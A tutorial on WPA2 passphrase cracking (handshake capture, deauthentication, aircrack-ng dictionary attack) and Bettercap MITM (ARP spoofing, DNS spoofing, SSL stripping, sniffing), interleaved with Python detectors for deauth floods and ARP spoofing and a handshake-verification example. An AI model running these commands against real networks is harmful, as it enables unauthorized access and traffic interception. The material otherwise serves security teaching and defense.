WPA2 Wi-Fi Cracking

WPA2 Wi-Fi Password Cracking

WPA2 Wi-Fi password cracking is the process of exploiting weaknesses in wireless networks, typically weak security configurations or poorly chosen passphrases, to gain unauthorized access. This guide covers the techniques and tools used in Wi-Fi security assessments, focusing on capturing the WPA2 four-way handshake, which contains the material needed to test passphrase guesses offline. Tools such as Aircrack-ng capture the handshake, and Aircrack-ng or Hashcat then test candidate passphrases against it, allowing penetration testers to assess the strength of a network's WPA2 passphrase.

We will also explore common attack vectors, such as dictionary attacks, brute-force methods, and the use of deauthentication attacks to force reconnections and capture handshakes more efficiently. Understanding these techniques is essential for evaluating and strengthening the security of wireless networks, ensuring that they are properly protected against unauthorized access and attacks.

However, with the introduction of WPA3, many of these attacks become less effective due to stronger encryption and a feature called Simultaneous Authentication of Equals (SAE), which replaces the traditional pre-shared key (PSK) handshake. SAE is a password-authenticated key exchange, so capturing the exchange yields nothing that can be tested offline; an attacker gets at most one guess per live interaction with the network. This protection against offline dictionary attacks makes it significantly harder to crack passwords using traditional methods. As a result, penetration testers must adopt different techniques when assessing networks secured by WPA3, as the common methods used for WPA2 cracking may not work on these newer networks.

Video Credit: David Bombal - Educational video on WPA2 and Wi-Fi Security.

Identifying Your Wireless Adapter

First, we need to identify our wireless adapter to ensure it is compatible with monitor mode, which is essential for packet capture. Use the command below to see available network interfaces:

iwconfig
lo        no wireless extensions.
eth0      no wireless extensions.

wlan0     IEEE 802.11  Mode:Managed  Frequency:2.457 GHz  Tx-Power=20 dBm   
           Retry short limit:7   RTS thr:off   Fragment thr:off
           Power Management:on

The output above shows that wlan0 is in Managed mode, the normal client (station) mode used to associate with an access point. To capture Wi-Fi traffic for a security assessment, we need to switch it to monitor mode, which passes every frame heard on the channel to the operating system rather than only the frames addressed to this interface.

Enabling Monitor Mode

Before enabling monitor mode, it is important to kill any processes that could interfere with the operation of the wireless interface:

sudo airmon-ng check kill

Now, enable monitor mode on wlan0 using:

sudo airmon-ng start wlan0

Verify that the mode has changed to Monitor by running the following command again:

iwconfig
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
           Retry short limit:7   RTS thr:off   Fragment thr:off
           Power Management:on

The interface name might have changed to wlan0mon, indicating that it is now in Monitor mode and ready for packet capture.

Scanning for Available Networks

Next, we will scan for available wireless networks. Use airodump-ng to gather information about nearby networks:

sudo airodump-ng wlan0mon

CH 13 ][ Elapsed: 0 s ][ 2024-10-12 20:44                                                                                  
                                                                                                                          
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID 
 00:00:00:00:00:00  -41  1          11    0     7  1300  WPA2 CCMP    PSK  ExampleWiFi

Identify the target network by noting its BSSID (MAC Address) and the Channel (CH) it is using. This information is crucial for the next steps.

Capturing Handshake Data

We will now capture packets to obtain the WPA2 four-way handshake, which is exchanged each time a client connects to the target network. Use the following command, replacing the channel and BSSID with the values noted above:

sudo airodump-ng -w capturefile -c 7 --bssid 00:00:00:00:00:00 wlan0mon

The above command writes captured packets to files prefixed capturefile; airodump-ng appends a sequence number, so the first capture lands in capturefile-01.cap. Once a client connects, airodump-ng reports the captured WPA handshake in its status line.

Forcing a Client to Reconnect

In some cases, you may need to force a device to disconnect so that it will reconnect, thereby allowing you to capture the handshake. This can be done by sending deauthentication packets:

sudo aireplay-ng --deauth 0 -a 00:00:00:00:00:00 wlan0mon

Wait for the handshake to be captured; airodump-ng shows it in its status line as [ WPA handshake: 00:00:00:00:00:00 ]. Because --deauth 0 keeps sending deauthentication frames until interrupted, stop aireplay-ng with Ctrl-C as soon as the handshake appears. Networks that enforce 802.11w Protected Management Frames (mandatory in WPA3) discard these unauthenticated deauthentication frames, so this step does not work against them.
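A defender's view of this step, as an added example rather than code from the tutorial or from Aircrack-ng: a small Python detector that parses raw 802.11 management frames from a monitor-mode capture and flags any transmitter that sends a burst of deauthentication frames. A wireless IDS applies exactly this heuristic. The frames, timestamps and client address below are constructed, and the BSSID is the tutorial's placeholder.

```python
"""Deauthentication-flood detector over raw 802.11 management frames.

Added example, not part of the original tutorial. It parses the fixed
24-byte 802.11 MAC header and the 2-byte reason code of deauthentication
frames and raises an alert when one transmitter sends more than a threshold
of deauthentication frames inside a short time window. The sample capture
is constructed below; the BSSID is the placeholder used in the tutorial.
"""
import struct
from collections import defaultdict, deque

DEAUTH_SUBTYPE = 12        # management subtype 0xC = deauthentication
BEACON_SUBTYPE = 8         # management subtype 0x8 = beacon
BROADCAST = "ff:ff:ff:ff:ff:ff"
# frame control, duration, addr1 (receiver), addr2 (transmitter), addr3 (BSSID), sequence control
HDR = struct.Struct("<HH6s6s6sH")


def mac_bytes(text):
    return bytes.fromhex(text.replace(":", ""))


def mac_text(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt_frame(subtype, dst, src, bssid, seq, body=b""):
    """Build a minimal 802.11 management frame (type 0) of the given subtype."""
    frame_control = subtype << 4          # protocol version 0, type 0 (management)
    return HDR.pack(frame_control, 0, mac_bytes(dst), mac_bytes(src),
                    mac_bytes(bssid), seq << 4) + body


def parse_mgmt_frame(raw):
    """Return header fields for a management frame, or None for anything else."""
    if len(raw) < HDR.size:
        return None
    fc, _duration, a1, a2, a3, _seq = HDR.unpack_from(raw)
    if (fc >> 2) & 0x3 != 0:              # type bits 2-3: 0 = management
        return None
    info = {"subtype": (fc >> 4) & 0xF, "dst": mac_text(a1),
            "src": mac_text(a2), "bssid": mac_text(a3)}
    if info["subtype"] == DEAUTH_SUBTYPE and len(raw) >= HDR.size + 2:
        info["reason"] = struct.unpack_from("<H", raw, HDR.size)[0]
    return info


def detect_deauth_floods(frames, window=1.0, threshold=10):
    """Flag transmitters that send `threshold` or more deauth frames within `window` seconds.

    `frames` is an iterable of (timestamp_seconds, raw_frame_bytes) in capture order.
    Returns one alert per offending transmitter address.
    """
    recent = defaultdict(deque)
    alerts = {}
    for ts, raw in frames:
        info = parse_mgmt_frame(raw)
        if info is None or info["subtype"] != DEAUTH_SUBTYPE:
            continue
        q = recent[info["src"]]
        q.append((ts, info["dst"], info.get("reason")))
        while q and ts - q[0][0] > window:   # slide the window
            q.popleft()
        if len(q) >= threshold and info["src"] not in alerts:
            alerts[info["src"]] = {
                "transmitter": info["src"],
                "first_seen": q[0][0],
                "count": len(q),
                # deauth to the broadcast address knocks every client off at once
                "broadcast": any(dst == BROADCAST for _, dst, _ in q),
                "reasons": sorted({r for _, _, r in q if r is not None}),
            }
    return list(alerts.values())


AP = "00:00:00:00:00:00"          # placeholder BSSID from the tutorial
CLIENT = "aa:bb:cc:dd:ee:01"      # constructed client address


def constructed_capture():
    """Constructed sample: beacons, one legitimate deauth, then a 30-frame flood."""
    frames, seq = [], 0
    for i in range(20):                                   # beacons every 100 ms
        frames.append((i * 0.1, build_mgmt_frame(BEACON_SUBTYPE, BROADCAST, AP, AP, seq)))
        seq += 1
    # a client leaving normally: one deauth, reason 3 (STA is leaving the BSS)
    frames.append((0.55, build_mgmt_frame(DEAUTH_SUBTYPE, AP, CLIENT, AP, 7, struct.pack("<H", 3))))
    for i in range(30):                                   # flood: 30 broadcast deauths in 300 ms
        frames.append((2.0 + i * 0.01, build_mgmt_frame(
            DEAUTH_SUBTYPE, BROADCAST, AP, AP, seq, struct.pack("<H", 7))))
        seq += 1
    return sorted(frames, key=lambda f: f[0])


if __name__ == "__main__":
    for alert in detect_deauth_floods(constructed_capture()):
        print(alert)
```

Run it as a script to print the single alert, or feed detect_deauth_floods the (timestamp, frame) pairs read from a real monitor-mode capture. The threshold should sit well above what normal roaming produces on the channel; 802.11w Protected Management Frames remain the actual fix, since a flood that clients ignore is noise rather than an outage.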

Cracking the Password

After capturing the handshake, the next step is to attempt to crack the WPA2 passphrase using a dictionary attack. Use aircrack-ng along with a wordlist like rockyou.txt:

aircrack-ng capturefile-01.cap -w /usr/share/wordlists/rockyou.txt

If the wordlist is compressed, unzip it first:

gunzip /usr/share/wordlists/rockyou.txt.gz

Aircrack-ng then derives the key for each candidate passphrase in the wordlist and checks it against the MIC in the captured handshake, stopping when a candidate matches or the wordlist is exhausted. Each candidate costs one PBKDF2 derivation of 4096 iterations, so the attack only succeeds against passphrases that appear in (or can be generated from) the wordlist; a long random passphrase is out of reach.
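To make clear what aircrack-ng is actually checking, and why passphrase entropy is the control that matters, the following Python example (added here; it is not the tutorial's or Aircrack-ng's code) carries the WPA2-Personal derivation through from passphrase to EAPOL MIC and tests one candidate against a handshake. The handshake values, the SSID ExampleWiFi and the client MAC are constructed; derive_pmk can be checked against the IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE").

```python
"""Why a captured WPA2 handshake is an offline password verifier.

Added example, not code from the tutorial or from Aircrack-ng. It implements
the WPA2-Personal key derivation from IEEE 802.11i (PBKDF2 -> PMK, PRF-512 ->
PTK, HMAC-SHA1 -> EAPOL MIC) and checks one candidate passphrase against a
handshake. The handshake values below are constructed, not captured.
"""
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK (the PSK in WPA2-Personal): PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))                 # 4 x 20 bytes, keep 64
    return out[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK from the public handshake values: both MACs and both nonces, smaller value first."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """EAPOL-Key MIC for key descriptor version 2 (CCMP): HMAC-SHA1 truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def handshake_verifies(candidate, ssid, ap_mac, sta_mac, anonce, snonce,
                       eapol_zeroed, captured_mic):
    """True if `candidate` reproduces the MIC seen in message 2 of the handshake.

    Everything except the passphrase is transmitted in the clear, which is what
    lets a captured handshake be tested offline at one PBKDF2 evaluation per guess.
    """
    kck = derive_ptk(derive_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, eapol_zeroed), captured_mic)


def constructed_handshake(passphrase="correct horse battery staple", ssid="ExampleWiFi"):
    """Simulate the public parts of a capture plus the MIC a supplicant using
    `passphrase` would send. All values are constructed for this example."""
    ap_mac = bytes.fromhex("000000000000")            # placeholder BSSID from the tutorial
    sta_mac = bytes.fromhex("aabbccddee01")           # constructed client MAC
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    # EAPOL-Key message 2 (99 bytes) with its 16-byte MIC field zeroed, as a
    # receiver must zero it before recomputing the MIC.
    eapol = (bytes.fromhex("0103005f")        # EAPOL version 1, type 3 (Key), body length 95
             + b"\x02" + b"\x01\x0a"          # descriptor type RSN; key info: version 2, pairwise, MIC
             + b"\x00\x10" + b"\x00" * 7 + b"\x01"                 # key length 16, replay counter 1
             + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
             + b"\x00" * 16 + b"\x00\x00")    # zeroed MIC, key data length 0
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return dict(ssid=ssid, ap_mac=ap_mac, sta_mac=sta_mac, anonce=anonce,
                snonce=snonce, eapol_zeroed=eapol, captured_mic=eapol_mic(kck, eapol))


if __name__ == "__main__":
    hs = constructed_handshake()
    print("right passphrase:", handshake_verifies("correct horse battery staple", **hs))
    print("wrong passphrase:", handshake_verifies("password123", **hs))
```

Every argument of handshake_verifies except the passphrase is sent in the clear, so a single captured handshake lets each guess be tested offline at the cost of one PBKDF2 derivation (two output blocks of 4096 HMAC-SHA1 iterations each), which is the work hashcat parallelises on GPUs. The mitigations follow directly: a passphrase with enough entropy that no feasible wordlist contains it, or WPA3-SAE, whose exchange gives an observer nothing to test offline.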

Video Credit: NetworkChuck - Wi-Fi Hacking

Introduction to Bettercap

Bettercap is a powerful and modular tool designed for network reconnaissance, penetration testing, and Man-in-the-Middle (MITM) attacks. With a wide range of capabilities, it allows attackers to intercept, modify, or even manipulate data being transmitted on a network. Bettercap works on many protocols, including HTTP, HTTPS, TCP, UDP, and more, and is highly effective for wireless network attacks. This guide will help you understand how to perform a MITM attack using Bettercap.

Installing Bettercap

To begin, install Bettercap. On Debian-based systems this can be done through the apt package manager, or you can build it from source with the Go toolchain.

sudo apt-get update
sudo apt-get install bettercap

Alternatively, you can install Bettercap with the Go toolchain (building from source needs the libpcap, libusb and libnetfilter-queue development headers installed first):

go install github.com/bettercap/bettercap@latest

Setting Up Bettercap for MITM Attacks

Before initiating a MITM attack, make sure the interface is in the right mode for the modules you intend to use. Bettercap's wifi modules (used for the deauthentication step below) need an adapter in monitor mode; the ARP spoofing, DNS spoofing and proxy modules instead need an ordinary interface that is associated with the target network and has an IP address on it, so do not put that interface into monitor mode. Use ifconfig or ip a to identify your interfaces and, for the wireless modules, enable monitor mode with airmon-ng as shown earlier or manually:

sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

Launching Bettercap

To start Bettercap, simply use the following command:

sudo bettercap -iface wlan0

Replace wlan0 with your network interface name.

Performing ARP Spoofing with Bettercap

ARP spoofing is a technique that allows an attacker to position themselves between two communicating devices, intercepting their data in a MITM attack. Bettercap makes ARP spoofing straightforward. First, you need to identify the targets on the network:

net.probe on

This command sends ARP and UDP discovery probes (mDNS, NBNS, UPnP) across the subnet and lists every host that answers; net.show prints the resulting host table. Once you have the IP address of your target, you can start ARP spoofing:

set arp.spoof.targets [target-ip]
arp.spoof on

Replace [target-ip] with the actual IP address of the device you want to target. You can also target multiple devices by separating the IPs with commas.
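As an added example from the detection side (not code from the tutorial or from Bettercap), the Python script below parses ARP frames and keeps the IP-to-MAC bindings it sees, alerting on the two signatures that ARP poisoning produces: an IP whose MAC suddenly changes, and one MAC that claims both the gateway's and a victim's address. The hosts, addresses and frames are constructed.

```python
"""ARP-spoofing detector: watch ARP traffic and alert on IP-to-MAC conflicts.

Added example, not part of the tutorial or of Bettercap. It parses Ethernet
ARP frames and keeps the IP -> MAC bindings it observes; an IP that changes
MAC, or a single MAC that claims several IPs (the gateway and a victim at
once), is the signature of the ARP poisoning described above. Addresses and
frames below are constructed for the demonstration.
"""
import struct

ETH = struct.Struct("!6s6sH")          # destination MAC, source MAC, EtherType
ARP = struct.Struct("!HHBBH6s4s6s4s")  # htype, ptype, hlen, plen, opcode, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"


def mac_bytes(text): return bytes.fromhex(text.replace(":", ""))
def mac_text(raw): return ":".join(f"{b:02x}" for b in raw)
def ip_bytes(text): return bytes(int(p) for p in text.split("."))
def ip_text(raw): return ".".join(str(b) for b in raw)


def build_arp(opcode, sender_mac, sender_ip, target_mac, target_ip, eth_dst=None):
    """Build an Ethernet II frame carrying an IPv4 ARP request or reply."""
    eth_dst = eth_dst or (BROADCAST_MAC if opcode == ARP_REQUEST else target_mac)
    return (ETH.pack(mac_bytes(eth_dst), mac_bytes(sender_mac), ETHERTYPE_ARP)
            + ARP.pack(1, 0x0800, 6, 4, opcode, mac_bytes(sender_mac), ip_bytes(sender_ip),
                       mac_bytes(target_mac), ip_bytes(target_ip)))


def parse_arp(frame):
    """Return the ARP fields of an IPv4-over-Ethernet ARP frame, else None."""
    if len(frame) < ETH.size + ARP.size:
        return None
    _dst, _src, ethertype = ETH.unpack_from(frame)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, opcode, sha, spa, tha, tpa = ARP.unpack_from(frame, ETH.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"opcode": opcode, "sender_mac": mac_text(sha), "sender_ip": ip_text(spa),
            "target_mac": mac_text(tha), "target_ip": ip_text(tpa)}


class ArpWatch:
    """Track sender IP -> MAC bindings from every ARP frame (requests included,
    since they also announce the sender's binding) and record conflicts."""

    def __init__(self, trusted=None):
        self.table = dict(trusted or {})    # optional static bindings, e.g. the gateway
        self.alerts = []

    def observe(self, ts, frame):
        arp = parse_arp(frame)
        if arp is None:
            return []
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        new = []
        known = self.table.get(ip)
        if known is not None and known != mac:
            new.append({"ts": ts, "type": "ip_mac_change", "ip": ip,
                        "old_mac": known, "new_mac": mac})
        self.table[ip] = mac
        ips = sorted(i for i, m in self.table.items() if m == mac)
        if len(ips) > 1:                    # one NIC answering for several hosts
            new.append({"ts": ts, "type": "mac_claims_multiple_ips", "mac": mac, "ips": ips})
        self.alerts.extend(new)
        return new


GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "00:11:22:33:44:01"    # constructed
VICTIM_IP, VICTIM_MAC = "192.168.1.10", "aa:bb:cc:dd:ee:01"     # constructed
ATTACKER_MAC = "de:ad:be:ef:00:01"                              # constructed


def constructed_traffic():
    """Normal ARP exchange followed by the two-sided poisoning a MITM needs."""
    return [
        (0.0, build_arp(ARP_REQUEST, VICTIM_MAC, VICTIM_IP, "00:00:00:00:00:00", GATEWAY_IP)),
        (0.1, build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)),
        (5.0, build_arp(ARP_REPLY, ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)),   # "I am the gateway"
        (5.0, build_arp(ARP_REPLY, ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP)),  # "I am the victim"
    ]


def run_detection(traffic):
    watch = ArpWatch()
    for ts, frame in traffic:
        watch.observe(ts, frame)
    return watch.alerts


if __name__ == "__main__":
    for alert in run_detection(constructed_traffic()):
        print(alert)
```

run_detection returns three alerts for the constructed traffic: the gateway's IP changing MAC, the victim's IP changing MAC, and the attacker's MAC holding both. Passing a static, trusted gateway binding to ArpWatch catches the poisoning on the first spoofed reply; on real networks, arpwatch, dynamic ARP inspection on managed switches, and static ARP entries on critical hosts provide the same check.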

HTTP/HTTPS Traffic Interception

To intercept HTTP traffic, Bettercap has a built-in module called http.proxy. To enable it, use:

http.proxy on

Bettercap can also intercept HTTPS: https.proxy terminates TLS with a certificate it generates itself and re-encrypts the traffic towards the real server, so the plaintext passes through Bettercap. Enable it with:

https.proxy on

Keep in mind that the generated certificate is not trusted by the client, so browsers show a certificate warning (and refuse outright for sites with an HSTS policy), which means this only works where users click through warnings; applications that pin certificates block it entirely.

DNS Spoofing

Another powerful feature of Bettercap is DNS spoofing, which allows you to redirect DNS requests to a fake IP address, such as a cloned website for phishing:

set dns.spoof.all true
dns.spoof on

With dns.spoof.all set to true, Bettercap answers every DNS query it sees on the network, not just the names listed in dns.spoof.domains, with the address in dns.spoof.address, which defaults to the interface's own IP. Clients that resolve names over DNS over TLS or DNS over HTTPS to a remote resolver are unaffected, because their queries never cross the LAN in plaintext.

Sniffing Network Data

Bettercap includes a powerful sniffer module for capturing packets from the network:

net.sniff on

Bettercap will start capturing packets and displaying parsed protocol data (HTTP requests, DNS queries, credentials it recognises and so on) on the console. The net.sniff.filter parameter accepts a BPF expression so that only specific traffic is captured.

SSL Stripping

SSL stripping is a method for downgrading HTTPS to HTTP: the proxy rewrites https:// links and redirects in the pages it relays so that the client's subsequent requests go out in plaintext, exposing information that would otherwise have been transmitted over a secure connection. To enable SSL stripping, use:

https.proxy on
set https.proxy.sslstrip true

This makes affected connections use HTTP instead of HTTPS, so their data is easier to capture and analyze. It is defeated by HTTP Strict Transport Security: a browser with a cached or preloaded HSTS entry for a site refuses to load it over plain HTTP, so the stripped links are never followed.

Disconnecting a Client

If you want to disconnect a specific client from the network to force reconnection (for instance, to capture data), you can use deauthentication attacks with Bettercap:

wifi.deauth [target-mac]

Replace [target-mac] with the MAC address of the device you want to disconnect (or the BSSID of an access point to disconnect all of its clients); Bettercap must first have discovered it through its wifi module, which runs on a monitor-mode interface. This will send deauthentication packets, disconnecting the target from the network momentarily. Clients and access points that use 802.11w Protected Management Frames ignore these packets.

Viewing Captured Traffic with Wireshark

Wireshark is a powerful tool that can be used to analyze the traffic captured during a MITM attack. After starting Bettercap’s sniffer, you can save the captured packets to a file and then analyze them using Wireshark.

First, make sure you have Wireshark installed:

sudo apt-get install wireshark

To save the captured packets to a pcap file, set the output parameter before turning the sniffer on with net.sniff on (net.sniff.output is a parameter, so it is configured with set):

set net.sniff.output /path/to/save/capture.pcap

Replace /path/to/save/capture.pcap with the desired file path where you want to save the packet capture.

Once you have saved the packets, open Wireshark and load the capture file:

wireshark /path/to/save/capture.pcap

Wireshark will provide a detailed view of the captured packets, allowing you to analyze various network protocols and identify sensitive information. Here are some tips for analyzing the traffic:

MITM Attacks Becoming Outdated

MITM attacks have become increasingly outdated due to the widespread adoption of HTTPS, which encrypts data between clients and servers. Unlike HTTP, which transmits information in plaintext, HTTPS ensures that sensitive data such as login credentials and personal information are securely transmitted, making it challenging for attackers to capture meaningful information without decrypting the traffic. Without access to the decryption key, intercepted data remains unreadable, significantly reducing the effectiveness of MITM attacks in modern networks. As a result, MITM attacks are mostly limited to situations where attackers can bypass or compromise encryption.